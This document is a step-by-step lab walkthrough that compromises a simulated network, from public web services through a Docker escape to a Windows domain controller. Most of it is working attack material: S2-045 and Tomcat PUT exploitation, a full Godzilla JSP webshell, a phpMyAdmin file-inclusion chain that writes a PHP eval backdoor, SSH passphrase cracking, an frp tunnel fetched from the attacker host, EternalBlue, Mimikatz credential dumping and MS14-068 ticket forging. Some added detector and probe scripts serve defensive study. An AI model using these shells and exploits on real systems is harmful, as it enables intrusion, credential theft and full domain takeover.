Environment Setup
Network Configuration
Two network adapters required:
- External network: 192.168.157.0/24
- Internal network: 192.168.183.0/24
Windows 7 Configuration
Start the Win7 VM and the Domain Controller first. Do not start the web server yet.
Credentials: douser / Dotest123
- Navigate to Control Panel → Power Options
- Set all power-saving features to "Never"
Domain Controller Setup
Log in with the password Test2008.
Change the default password when prompted at first login.
Web Server Setup
Credentials: ubuntu
Activating Docker Services
The four stopped containers are the three targets (Struts2 2.3.30, Tomcat with CVE-2017-12615, phpMyAdmin 4.8.1) and the MySQL 5.5 backend that phpMyAdmin needs; start all four, MySQL included:
ubuntu@ubuntu:~$ sudo -s
root@ubuntu:~# docker ps -a
CONTAINER ID IMAGE COMMAND CREATED STATUS
ec814f6ee002 vulhub/phpmyadmin:4.8.1 "docker-php-entrypoi…" 4 years ago Exited (255)
174745108fcb vulhub/struts2:2.3.30 "/usr/local/bin/mvn-…" 4 years ago Exited (255)
09dd4e5bfa91 cve-2017-12615_tomcat "catalina.sh run" 4 years ago Exited (255)
ad7866b3df9b mysql:5.5 "docker-entrypoint.s…" 4 years ago Exited (0)
root@ubuntu:~# docker start ec814f6ee002
root@ubuntu:~# docker start 174745108fcb
root@ubuntu:~# docker start 09dd4e5bfa91
root@ubuntu:~# docker start ad7866b3df9b
Initial Reconnaissance
Host Discovery
Using arp-scan:
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:10:3c:9b, IPv4: 192.168.157.129
192.168.157.1 00:50:56:c0:00:02 VMware, Inc.
192.168.157.128 00:0c:29:13:4a:c1 VMware, Inc.
192.168.157.254 00:50:56:e3:f1:bc VMware, Inc.
192.168.157.1 and 192.168.157.254 are VMware's own virtual-network addresses and 192.168.157.129 is Kali itself (the eth0 address above), so 192.168.157.128 is the only target on the external segment. netdiscover confirms it:
└─# netdiscover -s high -r 192.168.157.0/24
3 Captured ARP Req/Rep packets, from 3 hosts.
IP At MAC Address Count
192.168.157.128 00:0c:29:13:4a:c1 VMware, Inc.
Port Scanning
Quick scan:
└─# nmap -Pn 192.168.157.128
PORT STATE SERVICE
22/tcp open ssh
2001/tcp open dc
2002/tcp open globe
2003/tcp open finger
The service names in the quick scan (dc, globe, finger) are nmap's port-table defaults, not fingerprints; a version scan identifies all three as HTTP.
Detailed scan:
└─# nmap -sV -O 192.168.157.128
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu
2001/tcp open http Jetty 9.2.11.v20150529
2002/tcp open http Apache Tomcat 8.5.19
2003/tcp open http Apache httpd 2.4.25
Web Application Testing
Three HTTP services identified on ports 2001, 2002, and 2003.
Port 2001 - Jetty Service
Jetty is an open-source Java servlet container; here it is the embedded server of the vulhub/struts2 container (the mvn-based entrypoint shown in docker ps), so the application behind it is Struts2 2.3.30. Directory enumeration revealed only an /upload endpoint of limited use; the framework itself is the target.
Struts2 Vulnerability Scanning
Tool: STS2G
└─# ./STS2G --url=http://192.168.157.128:2001 --mode scan
Struts2-001 Not Vulnerable.
Struts2-005 Not Vulnerable.
*Found Struts2-045!
S2-045 is CVE-2017-5638: the Jakarta multipart parser evaluates a crafted Content-Type header as OGNL, so a single request executes commands. Command execution through the confirmed issue:
└─# ./STS2G --url=http://192.168.157.128:2001 --mode exec --vn 45 --cmd id
uid=0(root) gid=0(root) groups=0(root)
The command runs as root, but inside the vulhub/struts2 container, not on the Ubuntu host; this is one of three separate container footholds on this machine.
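The scan above only reports the tool's verdict. As an added example (not part of the original write-up or of STS2G), the Python below shows the shape of the request S2-045 rides on and flags it in raw HTTP requests, the check a WAF rule or a log-triage script would make: Struts hands a request to the Jakarta multipart parser whenever Content-Type merely contains the string multipart/form-data, and an OGNL expression in that header is what ends up evaluated. The sample requests are constructed, not captured from the lab.

```python
"""Flag S2-045 (CVE-2017-5638) OGNL injection in the Content-Type of raw HTTP requests."""
import re

# Struts routes a request to the Jakarta multipart parser whenever Content-Type
# *contains* this string; a malformed value then reaches OGNL via the error message.
MULTIPART = "multipart/form-data"

# Fragments found in every public S2-045 payload family.
OGNL_MARKERS = re.compile(
    r"%\{"                                 # start of an OGNL expression
    r"|#_memberAccess"                     # sandbox object every payload flips
    r"|@ognl\.OgnlContext@"                # DEFAULT_MEMBER_ACCESS lookup
    r"|ProcessBuilder|Runtime@getRuntime"  # command execution primitives
)


def content_type(raw_request):
    """Content-Type header value of a raw HTTP/1.x request (headers end at the blank line), or ''."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "content-type":
            return value.strip()
    return ""


def is_s2_045(raw_request):
    """True when the Content-Type would be parsed as multipart and carries OGNL.
    A well-formed upload header ("multipart/form-data; boundary=...") is not flagged."""
    ct = content_type(raw_request)
    return MULTIPART in ct.lower() and OGNL_MARKERS.search(ct) is not None


def triage(raw_requests):
    """Indexes of the suspicious requests in a batch (e.g. requests replayed from a capture)."""
    return [i for i, r in enumerate(raw_requests) if is_s2_045(r)]


# Constructed samples: a normal file upload, a scanner-style S2-045 probe, a JSON post.
BENIGN_UPLOAD = ("POST /upload.action HTTP/1.1\r\nHost: 192.168.157.128:2001\r\n"
                 "Content-Type: multipart/form-data; boundary=----WebKitFormBoundary\r\n\r\n")
PROBE = ("GET /index.action HTTP/1.1\r\nHost: 192.168.157.128:2001\r\n"
         "Content-Type: %{(#_='multipart/form-data')."
         "(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)."
         "(#_memberAccess?(#_memberAccess=#dm):(#context.setMemberAccess(#dm)))."
         "(#cmd='id').(#p=new java.lang.ProcessBuilder({'/bin/sh','-c',#cmd}))}\r\n\r\n")
JSON_POST = "POST /api HTTP/1.1\r\nHost: app\r\nContent-Type: application/json\r\n\r\n{}"

if __name__ == "__main__":
    print(triage([BENIGN_UPLOAD, PROBE, JSON_POST]))  # only the probe is flagged
```

The markers are deliberately few: the `multipart/form-data` substring is a hard requirement of the bug (without it the header never reaches the parser), so pairing it with any OGNL syntax catches the variants without matching legitimate uploads.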
Port 2002 - Tomcat Service
This is CVE-2017-12615, the vulnerability the container is named for: the DefaultServlet is configured with readonly=false in conf/web.xml, so Tomcat accepts HTTP PUT and writes the request body into the webroot. A JSP placed that way is compiled and executed on the next GET, which is remote code execution.
Verifying File Upload Vulnerability
Configure Burp Suite as the proxy, intercept any request to port 2002, change the method from GET to PUT and give it a body (Burp fills in Content-Length):
PUT /12.jsp HTTP/1.1
Host: 192.168.157.128:2002

123456
Requesting /12.jsp afterwards and seeing 123456 confirms the write. If the bare .jsp path is refused, the JspServlet (mapped to *.jsp) is rejecting the PUT; send it as /12.jsp/ instead, which falls through to the DefaultServlet, and the trailing slash is dropped when the file is written (the /12.jsp%20 variant works the same way only on Windows, where NTFS drops the trailing space). Delete the test file when done: with readonly=false the DELETE method is honoured as well.
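As an added example, not part of the original write-up, this Python probe performs the same PUT check without Burp and without placing executable code on the target: it tries the bare .jsp path, then the trailing-slash and %20 variants, reads the marker back and deletes it. FakeTomcat is a constructed stand-in for the lab target so the logic can be run offline; the target URL and the file name are assumptions.

```python
"""Probe for a PUT-writable Tomcat webroot (CVE-2017-12615 / DefaultServlet readonly=false)."""
import http.client
import secrets
from urllib.parse import urlparse

# Order matters: a bare "*.jsp" is mapped to the JspServlet, which rejects PUT.
# "x.jsp/" is not matched by that mapping, so the DefaultServlet handles it and
# strips the slash before writing x.jsp.  "x.jsp%20" only works on Windows
# (NTFS drops the trailing space); on Linux it writes "x.jsp " and the read-back fails.
VARIANTS = ("/{n}.jsp", "/{n}.jsp/", "/{n}.jsp%20")


def http_send(base_url, method, path, body=None):
    """Real transport: (status, body_text) for one request; http.client adds Content-Length."""
    u = urlparse(base_url)
    conn = http.client.HTTPConnection(u.hostname, u.port or 80, timeout=10)
    try:
        conn.request(method, path, body=body)
        resp = conn.getresponse()
        return resp.status, resp.read().decode("utf-8", "replace")
    finally:
        conn.close()


def probe_tomcat_put(base_url, send=http_send, name=None):
    """Return the first path variant that was written and reads back as /<name>.jsp, else None.

    The marker is plain text (no JSP code), so nothing executes on the target, and
    every file the server accepted is deleted again whether or not it read back."""
    name = name or "chk_" + secrets.token_hex(4)
    marker = "put-check " + secrets.token_hex(8)
    for variant in VARIANTS:
        put_path = variant.format(n=name)
        status, _ = send(base_url, "PUT", put_path, marker)
        if status not in (200, 201, 204):        # 201 new file, 204 overwritten
            continue
        status, body = send(base_url, "GET", f"/{name}.jsp")
        send(base_url, "DELETE", put_path)       # best-effort cleanup either way
        if status == 200 and marker in body:
            return put_path
    return None


class FakeTomcat:
    """Constructed model of the lab target on Linux: readonly=false, bare .jsp PUT refused."""
    def __init__(self, accept_bare=False):
        self.files, self.accept_bare = {}, accept_bare

    @staticmethod
    def _canon(path):
        # trailing slash is stripped; %20 becomes a literal trailing space (Linux behaviour)
        return path[:-1] if path.endswith("/") else path.replace("%20", " ")

    def __call__(self, base_url, method, path, body=None):
        if method == "PUT":
            if path.endswith(".jsp") and not self.accept_bare:
                return 404, ""
            self.files[self._canon(path)] = body
            return 201, ""
        if method == "DELETE":
            return (204, "") if self.files.pop(self._canon(path), None) is not None else (404, "")
        return (200, self.files[path]) if path in self.files else (404, "")


if __name__ == "__main__":
    # Offline run against the fake; pass send=http_send (the default) for a real target.
    print(probe_tomcat_put("http://192.168.157.128:2002", FakeTomcat(), name="chk"))
```

Against a live target, call `probe_tomcat_put("http://192.168.157.128:2002")` and leave `send` at its default; the returned variant tells you which path form the later webshell upload has to use.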
Generating Webshell
Create a JSP payload using Godzilla (password: pass, key: key; the xc constant below is the first 16 hex characters of md5("key")):
<%!
// Godzilla JSP_AES_BASE64 shell. xc: AES key (first 16 hex chars of md5("key")); pass: request parameter carrying the payload; md5: md5(pass+xc), whose two halves frame the response body.
String xc="3c6e0b8a9c15224a"; String pass="pass"; String md5=md5(pass+xc);
// Loader whose Q() turns the decrypted bytes into a class via defineClass().
class X extends ClassLoader{public X(ClassLoader z){super(z);}public Class Q(byte[] cb){return super.defineClass(cb, 0, cb.length);} }
// AES (ECB with PKCS5 padding, the JDK default for "AES") under the shared key: m=true encrypts, m=false decrypts.
public byte[] x(byte[] s,boolean m){ try{javax.crypto.Cipher c=javax.crypto.Cipher.getInstance("AES");c.init(m?1:2,new javax.crypto.spec.SecretKeySpec(xc.getBytes(),"AES"));return c.doFinal(s); }catch (Exception e){return null; }}
public static String md5(String s) {String ret = null;try {java.security.MessageDigest m;m = java.security.MessageDigest.getInstance("MD5");m.update(s.getBytes(), 0, s.length());ret = new java.math.BigInteger(1, m.digest()).toString(16).toUpperCase();} catch (Exception e) {}return ret; }
// Base64 through reflection so the same file compiles on Java 8+ (java.util.Base64) and on older JDKs (sun.misc).
public static String base64Encode(byte[] bs) throws Exception {Class base64;String value = null;try {base64=Class.forName("java.util.Base64");Object Encoder = base64.getMethod("getEncoder", null).invoke(base64, null);value = (String)Encoder.getClass().getMethod("encodeToString", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Encoder"); Object Encoder = base64.newInstance(); value = (String)Encoder.getClass().getMethod("encode", new Class[] { byte[].class }).invoke(Encoder, new Object[] { bs });} catch (Exception e2) {}}return value; }
public static byte[] base64Decode(String bs) throws Exception {Class base64;byte[] value = null;try {base64=Class.forName("java.util.Base64");Object decoder = base64.getMethod("getDecoder", null).invoke(base64, null);value = (byte[])decoder.getClass().getMethod("decode", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e) {try { base64=Class.forName("sun.misc.BASE64Decoder"); Object decoder = base64.newInstance(); value = (byte[])decoder.getClass().getMethod("decodeBuffer", new Class[] { String.class }).invoke(decoder, new Object[] { bs });} catch (Exception e2) {}}return value; }
%><%
// First request: decrypt the payload class and cache it in the session. Later requests: instantiate it, hand it the output buffer and pageContext through equals(), run it via toString(), and return the AES+Base64 result framed by the two halves of md5.
try{byte[] data=base64Decode(request.getParameter(pass));data=x(data, false);
if (session.getAttribute("payload")==null){session.setAttribute("payload",new X(this.getClass().getClassLoader()).Q(data));}
else{request.setAttribute("parameters",data);java.io.ByteArrayOutputStream arrOut=new java.io.ByteArrayOutputStream();Object f=((Class)session.getAttribute("payload")).newInstance();f.equals(arrOut);f.equals(pageContext);response.getWriter().write(md5.substring(0,16));f.toString();response.getWriter().write(base64Encode(x(arrOut.toByteArray(), true)));response.getWriter().write(md5.substring(16));} }catch (Exception e){}
%>
Upload the shell and connect via Godzilla.
Port 2003 - PHPMyAdmin 4.8.1
This version has CVE-2018-12613: index.php include()s whatever ?target= names once Core::checkPageValidity() accepts it, and that check URL-decodes the value a second time before comparing the part before "?" against a whitelist of page names. The web server decodes %253f once to %3f, the checker decodes it again to ? and sees the whitelisted db_sql.php, while include() receives db_sql.php%3f/../... and resolves the .. components up to the real path.
Arbitrary File Read:
http://192.168.157.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
Gaining Shell via Session File Inclusion:
PHP keeps session data in files named /tmp/sess_<session id>, and phpMyAdmin stores the text of the last SQL query in the session, so a query containing PHP code puts that code into a file the inclusion bug can reach. Read the session id from the phpMyAdmin cookie (F12 DevTools, storage tab), then include the session file to confirm it is readable:
http://192.168.157.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_c0f9687bb896783adb49b8a91b6fac13
Writing Webshell:
Run this query in phpMyAdmin's SQL tab. The backslash before $_POST stops PHP interpolating it inside the double-quoted string, so the written file contains the literal <?php @eval($_POST[1]);?>; shell.php lands in the directory index.php runs from, the phpMyAdmin webroot:
select '<?php file_put_contents("shell.php","<?php @eval(\$_POST[1]);?>");?> ';
The session id may change after the query runs; re-read the cookie and include the current session file. Including it executes the embedded PHP, which writes shell.php:
http://192.168.157.128:2003/index.php?target=db_sql.php%253f/../../../../../../../../tmp/sess_e42eb1251c3d92e16b840eafe8d9ea08
Access shell.php and connect with AntSword (the connection password is 1, the $_POST key used in the backdoor).
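To see why the double-encoded target passes, here is a Python model of checkPageValidity() from phpMyAdmin 4.8.1 beside the 4.8.2 fix. It is an added example that re-implements the PHP logic; it is not phpMyAdmin's own code, and the whitelist is an excerpt. lfi_target() builds the ?target= value used above and as_seen_by_php() applies the single decode the web server performs before PHP sees the parameter.

```python
"""Model of phpMyAdmin 4.8.1 Core::checkPageValidity() and index.php's include gate (CVE-2018-12613)."""
from urllib.parse import unquote

# Excerpt of Core::$goto_whitelist (assumption: the real list is much longer).
GOTO_WHITELIST = {"db_sql.php", "db_structure.php", "server_sql.php", "tbl_sql.php", "index.php"}
TARGET_BLACKLIST = {"import.php", "export.php"}


def _before_query(page):
    """PHP: mb_substr($page, 0, mb_strpos($page . '?', '?'))"""
    return page.split("?", 1)[0]


def check_page_validity_4_8_1(page, whitelist=GOTO_WHITELIST):
    """Vulnerable: after the exact and 'page?query' comparisons fail, the value is
    urldecode()d once more and compared again, although include() never sees that form."""
    if page in whitelist or _before_query(page) in whitelist:
        return True
    return _before_query(unquote(page)) in whitelist


def check_page_validity_fixed(page, whitelist=GOTO_WHITELIST):
    """4.8.2: the urldecode() branch is removed; the checked string is the included string."""
    return page in whitelist or _before_query(page) in whitelist


def lfi_target(path, depth=8):
    """?target= value as it must appear in the URL. The web server decodes %25 once, leaving
    %3f for PHP; only the 4.8.1 checker decodes that into the '?' it splits on."""
    return "db_sql.php%253f" + "/.." * depth + path


def as_seen_by_php(url_value):
    """Contents of $_REQUEST['target'] after PHP's single decode of the query string."""
    return unquote(url_value)


def would_include(url_value, checker):
    """Mirror of the index.php gate. Returns (included, path passed to include); PHP
    collapses the '..' components of that path lexically, so /etc/passwd is what gets read."""
    target = as_seen_by_php(url_value)
    ok = (bool(target) and not target.startswith("index")
          and target not in TARGET_BLACKLIST and checker(target))
    return ok, target


if __name__ == "__main__":
    value = lfi_target("/etc/passwd")
    print(would_include(value, check_page_validity_4_8_1))
    print(would_include(value, check_page_validity_fixed))
```

A legitimate value such as db_sql.php?db=test passes both checkers, which is what the "part before ?" comparison exists for; the fix only removes the second decode, so the checker and include() now agree on the string.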
Container Escape
From the Tomcat foothold (the Godzilla shell), enumerate the system. A .dockerenv file in / indicates execution inside a Docker container:
/ > ls -la
Identifying Host Disk:
/ > fdisk -l
Disk /dev/sda: 10 GiB, 10737418240 bytes
/dev/sda1 * 2048 16779263 8G 83 Linux
Mounting Host Filesystem:
/ > mkdir /hostmnt
/ > mount /dev/sda1 /hostmnt
/hostmnt > dir
bin etc lib media opt root sbin tmp usr
boot home lib64 mnt proc run srv sys var
This grants access to the host's root filesystem, and it only works because the container runs with --privileged: it sees the host's block devices under /dev and holds CAP_SYS_ADMIN, so mount(2) is allowed. A default container has neither, and fdisk -l would list nothing. Anything read or written under /hostmnt is the host itself.
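Before trying the mount it is worth knowing whether the container is privileged at all. The following Python check is an added example, not part of the original write-up: it decodes the CapEff bitmask from /proc/self/status against the capability numbers from linux/capability.h and reports the capabilities that enable a host escape, alongside whether host disks are visible under /dev. The two status excerpts are constructed (Docker's default effective set, and the all-capabilities set of a --privileged container on a kernel with 38 capabilities).

```python
"""Which capabilities does this container hold, and do they allow the disk-mount escape?"""
import os
import re

# Index = capability number (linux/capability.h).
CAP_NAMES = (
    "chown dac_override dac_read_search fowner fsetid kill setgid setuid setpcap "
    "linux_immutable net_bind_service net_broadcast net_admin net_raw ipc_lock "
    "ipc_owner sys_module sys_rawio sys_chroot sys_ptrace sys_pacct sys_admin "
    "sys_boot sys_nice sys_resource sys_time sys_tty_config mknod lease audit_write "
    "audit_control setfcap mac_override mac_admin syslog wake_alarm block_suspend "
    "audit_read perfmon bpf checkpoint_restore"
).split()
CAP_NUM = {name: i for i, name in enumerate(CAP_NAMES)}

# Host-escape primitives; Docker's default capability set contains none of them.
ESCAPE_CAPS = {
    "sys_admin": "mount(2): mount the host block device as shown above",
    "sys_module": "load a kernel module into the host kernel",
    "sys_ptrace": "ptrace host processes when the PID namespace is shared",
    "dac_read_search": "open_by_handle_at(): read host files by handle",
}


def parse_cap_eff(status_text):
    """CapEff from /proc/<pid>/status text as an int, or None if the line is missing."""
    m = re.search(r"^CapEff:\s*([0-9a-fA-F]+)\s*$", status_text, re.M)
    return int(m.group(1), 16) if m else None


def decode_caps(mask):
    """Names of the capabilities set in a CapEff bitmask."""
    return [name for name in CAP_NAMES if (mask >> CAP_NUM[name]) & 1]


def assess(status_text, dockerenv_present, block_devices):
    """Summarise the escape prospects of a container.

    block_devices: entries found under /dev, e.g. ["sda", "sda1"]; a --privileged
    container sees the host's disks there, a default one does not."""
    mask = parse_cap_eff(status_text)
    caps = set(decode_caps(mask)) if mask is not None else set()
    disks = [d for d in block_devices if d.startswith(("sd", "vd", "nvme", "xvd"))]
    return {
        "in_docker": dockerenv_present,
        "cap_eff": mask,
        "escape_caps": {c: why for c, why in ESCAPE_CAPS.items() if c in caps},
        "host_disks": disks,
        "disk_mountable": "sys_admin" in caps and bool(disks),
    }


def assess_current_process():
    """Run the check on the calling process (Linux only)."""
    with open("/proc/self/status") as f:
        status = f.read()
    devs = os.listdir("/dev") if os.path.isdir("/dev") else []
    return assess(status, os.path.exists("/.dockerenv"), devs)


# Constructed /proc/self/status excerpts: Docker's default set (14 capabilities, seccomp
# filter on) and the full set of a --privileged container (seccomp off) on a 38-capability kernel.
STATUS_DEFAULT = "Name:\tsh\nCapInh:\t0000000000000000\nCapEff:\t00000000a80425fb\nSeccomp:\t2\n"
STATUS_PRIVILEGED = "Name:\tsh\nCapInh:\t0000000000000000\nCapEff:\t0000003fffffffff\nSeccomp:\t0\n"

if __name__ == "__main__":
    for label, status, devs in (("default", STATUS_DEFAULT, ["null", "zero"]),
                                ("privileged", STATUS_PRIVILEGED, ["null", "sda", "sda1"])):
        r = assess(status, True, devs)
        print(label, sorted(r["escape_caps"]), "disk_mountable:", r["disk_mountable"])
```

Run `assess_current_process()` from the webshell's Python if one is available, or read the same two facts by hand: `grep CapEff /proc/self/status` and `ls /dev/sd*`. A CapEff of 00000000a80425fb means the mount step above will fail with EPERM even as root.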
SSH Key Passphrase Cracking
Located a passphrase-protected SSH private key in home/ubuntu/.ssh on the mounted host filesystem. Copy it to Kali, convert it to a john hash and run a wordlist attack on the passphrase:
└─# vim ssh_key
└─# ssh2john ssh_key > hash
└─# john hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH])
ubuntu (ssh)
Connecting via SSH (ssh refuses a key file that is group- or world-readable, so give the copied key mode 0600 first; the cracked passphrase is ubuntu):
└─# ssh -i ssh_key ubuntu@192.168.157.128
Warning: Permanently added '192.168.157.128' (ED25519) to the list of known hosts.
ubuntu@ubuntu:~$
Domain Penetration Phase
Privilege Escalation
ubuntu@ubuntu:~$ sudo -l
User ubuntu may run the following commands on ubuntu:
(ALL : ALL) ALL
ubuntu@ubuntu:~$ sudo -s
root@ubuntu:~# id
uid=0(root) gid=0(root) groups=0(root)
Check the network interfaces: a second adapter sits on the internal subnet 192.168.183.0/24, which is unreachable from Kali.
Attempted fscan for internal scanning but binary incompatible with this environment.
Building Tunnel Infrastructure
Tool: frp (fast reverse proxy). frpc on the Ubuntu host connects out to frps on Kali (port 7000); frps then exposes a SOCKS5 listener on Kali port 8989 whose connections exit from the Ubuntu host, so tools on Kali reach 192.168.183.0/24 through it.
Client Configuration (frpc.ini):
[common]
server_addr = 192.168.157.129
server_port = 7000
[socks_proxy]
type = tcp
remote_port = 8989
plugin = socks5
Server Configuration (frps.ini):
[common]
bind_port = 7000
As written, neither side authenticates: any host that reaches Kali:7000 can register a proxy, and Kali:8989 is an open SOCKS pivot into the target network. frp's ini format takes a shared token under [common] on both sides and plugin_user / plugin_passwd in the socks5 proxy section; set them even in a lab.
Deployment Steps:
- Download the client binary and config to the compromised host (served from a web server listening on Kali port 8888):
root@ubuntu:~# wget http://192.168.157.129:8888/frpc
root@ubuntu:~# wget http://192.168.157.129:8888/frpc.ini
root@ubuntu:~# chmod +x frpc
- Start server on Kali:
└─# ./frps -c ./frps.ini
- Start client on Ubuntu (background):
root@ubuntu:~# ./frpc -c ./frpc.ini &
Configure Proxychains:
Edit /etc/proxychains4.conf and replace the default entry under [ProxyList] with socks5 127.0.0.1 8989, so proxychains-wrapped tools are routed through the tunnel.
Internal Network Enumeration
Use the Metasploit SMB version scanner through the SOCKS proxy. Only TCP connect-style probes work through SOCKS, so there is no ARP or ICMP sweep here; a response on port 445 is the host-discovery method:
msf6 > use auxiliary/scanner/smb/smb_version
msf6 auxiliary(scanner/smb/smb_version) > setg proxies socks5:127.0.0.1:8989
msf6 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.183.1-255
msf6 auxiliary(scanner/smb/smb_version) > exploit
Identified two live hosts with port 445 open: 192.168.183.129 and 192.168.183.130
Exploiting MS17-010
Target: 192.168.183.129 (Win7). A bind payload is used because the victim cannot reach Kali for a reverse connection; Metasploit connects to the bind port through the proxy set with setg above. ReverseAllowProxy only matters for reverse payloads and is harmless here.
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/bind_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.183.129
msf6 exploit(windows/smb/ms17_010_eternalblue) > set ReverseAllowProxy true
msf6 exploit(windows/smb/ms17_010_eternalblue) > exploit
[+] 192.168.183.129:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1
[+] 192.168.183.129:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Meterpreter session 1 opened
Credential Dumping (kiwi is the Mimikatz extension; the wdigest provider still caches the plaintext password on an unpatched Windows 7, which is why Dotest123 appears in clear):
meterpreter > load kiwi
meterpreter > creds_all
msv credentials
===============
Username Domain NTLM
-------- ------ ----
douser DEMO bc23b0b4d5bf5ff42bc61fb62e13886e
wdigest credentials
===================
Username Domain Password
-------- ------ --------
douser DEMO Dotest123
Enabling RDP:
C:\Windows\system32>REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
Setting fDenyTSConnections to 0 turns Remote Desktop on; if the Windows firewall is active, port 3389 stays blocked until the Remote Desktop rule group is enabled or the firewall is switched off.
Activating Administrator Account:
Resetting the built-in Administrator password is a loud, destructive change that belongs in a lab only; it is done here so that RDP has a known local login:
C:\Windows\system32>net user administrator Admin123
C:\Windows\system32>net user administrator /active:yes
Remote Desktop Access:
└─# proxychains rdesktop 192.168.183.129
Attacking Domain Controller
Target: 192.168.183.130 (Windows Server 2008)
Available tools on douser's desktop: mimikatz, MS14-068, psexec64
MS14-068 Exploitation
MS14-068 (CVE-2014-6324) needs a valid domain user's password and SID. The Meterpreter session runs as SYSTEM, so migrate into a process owned by douser and read the SID from there:
meterpreter > ps -ef | grep douser
2652 892 dwm.exe x64 1 DEMO\douser
meterpreter > migrate 2652
meterpreter > getuid
Server username: DEMO\douser
meterpreter > shell
C:\Windows\system32>whoami /user
demo\douser S-1-5-21-979886063-1111900045-1414766810-1107
Forge a TGT whose PAC claims domain-admin group membership (this is what MS14-068 yields; it is not a golden ticket, which would need the krbtgt hash):
.\MS14-068.exe -u douser@demo.com -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130 -p Dotest123
This writes a ccache file for douser@demo.com in the current directory.
Ticket Injection with Mimikatz
Use klist to view the current tickets, then purge them (mimikatz kerberos::purge) and import the forged one (kerberos::ptc with the ccache file); klist afterwards should show the new TGT. Because the ticket is presented through Kerberos, the DC has to be addressed by hostname (a name a service ticket can be requested for), not by IP, in the next step.
Establishing Shell on Domain Controller
PsExec64.exe /accepteula /s \\WIH-ENS2UR5TR3N cmd
/s runs cmd as SYSTEM on the remote machine; WIH-ENS2UR5TR3N is the DC's hostname.
Exploiting DC via EternalBlue
msf6 > use exploit/windows/smb/ms17_010_eternalblue
msf6 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.183.130
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[+] 192.168.183.130:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 HPC Edition 7601 Service Pack 1
[+] 192.168.183.130:445 - ETERNALBLUE overwrite completed successfully
[*] Meterpreter session 2 opened
Disable Firewall (so later connections such as RDP are not blocked; a loud change, acceptable only in a lab):
meterpreter > shell
C:\Windows\system32>netsh advfirewall set allprofiles state off
Verify Connectivity:
meterpreter > ipconfig
Interface 11
============
Name : Intel(R) PRO/1000 MT Network Connection
IPv4 Address : 192.168.183.130
IPv4 Netmask : 255.255.255.0
Full domain compromise achieved: from the external web server, through the container escape and the SSH foothold, the frp SOCKS tunnel, EternalBlue on the Windows 7 workstation and MS14-068 against the domain controller, to SYSTEM on the DC.